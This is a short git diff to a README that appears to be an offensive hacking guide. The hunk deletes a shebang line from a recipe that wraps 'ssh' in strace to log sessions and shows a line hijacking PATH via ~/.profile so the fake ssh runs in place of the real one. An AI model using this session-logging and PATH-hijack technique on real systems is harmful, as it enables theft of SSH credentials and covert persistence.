diff --git a/README.md b/README.md index 6619167..25352c5 100644 --- a/README.md +++ b/README.md @@ -685,7 +685,6 @@ Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strac Create a wrapper script called 'ssh' that executes strace + ssh to log the session: ``` # Cut & Paste the following into a bash shell: -#! /bin/bash # Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh: echo 'PATH=~/.local/bin:$PATH #0xFD0E' >>~/.profile